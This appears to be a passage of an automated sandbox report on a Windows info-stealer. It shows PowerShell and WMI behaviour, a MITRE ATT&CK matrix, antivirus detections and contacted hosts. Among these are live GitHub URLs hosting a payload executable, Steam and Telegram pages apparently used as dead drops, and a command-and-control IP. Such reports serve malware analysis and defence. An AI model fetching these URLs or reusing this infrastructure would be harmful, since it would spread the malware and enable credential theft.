Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00431442 GetUserNameA,14_2_00431442
Source: C:\Users\user\Desktop\YYjRtxS70h.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
DLL Side-Loading		11
Process Injection		1
Masquerading		OS Credential Dumping1
Query Registry		Remote Services1
Archive Collected Data		21
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		11
Disable or Modify Tools		LSASS Memory211
Security Software Discovery		Remote Desktop ProtocolData from Removable Media2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
Virtualization/Sandbox Evasion		Security Account Manager1
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection		NTDS31
Virtualization/Sandbox Evasion		Distributed Component Object ModelInput Capture3
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
Obfuscated Files or Information		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Software Packing		Cached Domain Credentials1
Account Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Timestomp		DCSync1
System Owner/User Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading		Proc Filesystem2
File and Directory Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow12
System Information Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579768 Sample: YYjRtxS70h.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 88 45 t.me 2->45 47 steamcommunity.com 2->47 49 2 other IPs or domains 2->49 61 Multi AV Scanner detection for submitted file 2->61 63 Machine Learning detection for sample 2->63 65 PE file has a writeable .text section 2->65 67 3 other signatures 2->67 9 YYjRtxS70h.exe 15 7 2->9         started        signatures3 process4 dnsIp5 57 github.com 20.233.83.145, 443, 49708 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 9->57 59 raw.githubusercontent.com 185.199.110.133, 443, 49709 FASTLYUS Netherlands 9->59 41 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, PE32 9->41 dropped 43 C:\Users\user\AppData\...\YYjRtxS70h.exe.log, CSV 9->43 dropped 71 Adds a directory exclusion to Windows Defender 9->71 14 powershell.exe 7 9->14         started        17 powershell.exe 7 9->17         started        19 powershell.exe 7 9->19         started        21 2 other processes 9->21 file6 signatures7 process8 dnsIp9 73 Adds a directory exclusion to Windows Defender 14->73 24 powershell.exe 23 14->24         started        27 conhost.exe 14->27         started        29 powershell.exe 23 17->29         started        31 conhost.exe 17->31         started        33 powershell.exe 23 19->33         started        35 conhost.exe 19->35         started        51 37.27.43.98, 443, 49712, 49716 UNINETAZ Iran (ISLAMIC Republic Of) 21->51 53 t.me 149.154.167.99, 443, 49710, 49714 TELEGRAMRU United Kingdom 21->53 55 steamcommunity.com 104.102.49.254, 443, 49711, 49715 AKAMAI-ASUS United States 21->55 75 Multi AV Scanner detection for dropped file 21->75 77 Machine Learning detection for dropped file 21->77 signatures10 process11 signatures12 69 Loading BitLocker PowerShell Module 24->69 37 WmiPrvSE.exe 27->37         started        39 conhost.exe 31->39         started        process13

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
YYjRtxS70h.exe62%VirustotalBrowse
YYjRtxS70h.exe66%ReversingLabsByteCode-MSIL.Trojan.Stealerc
YYjRtxS70h.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe100%Joe Sandbox ML
C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe63%ReversingLabsWin32.Trojan.Vigorf

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
steamcommunity.com
104.102.49.254
truefalse
    		high
    github.com
    		20.233.83.145
    		truefalse
      		high
      raw.githubusercontent.com
      		185.199.110.133
      		truefalse
        		high
        t.me
        		149.154.167.99
        		truefalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://github.com/olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exefalse
            		high
            https://steamcommunity.com/profiles/76561199804377619false
              		high
              https://raw.githubusercontent.com/olosha1/pockket/refs/heads/main/jtkhikadjthsad.exefalse
                		high
                https://t.me/m3wm0wfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LXN&l=english&am168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                    		high
                    https://player.vimeo.com168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://steamcommunity.com/profiles/76561199804377619com168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2523079878.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&l=engli168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                          		high
                          http://crl.microsoftpowershell.exe, 00000005.00000002.1563697900.00000000086C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1610889169.000000000784D000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://steamcommunity.com/?subsection=broadcasts168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                              		high
                              https://steamcommunity.com/profiles/76561199804377619?168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://37.27.43.98/T168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://steamcommunity.com/profiles/76561199804377619E168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://steamcommunity.com/profiles/76561199804377619G168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://community.cloudflare.steamstatic.com/public/css/applications/community/main.168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpfalse
                                        		high
                                        https://store.steampowered.com/subscriber_agreement/168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                          		high
                                          https://www.gstatic.cn/recaptcha/168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://37.27.43.98/n168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://telegram.org/img/t_logo_2x.png168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.valvesoftware.com/legal.htm168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                  		high
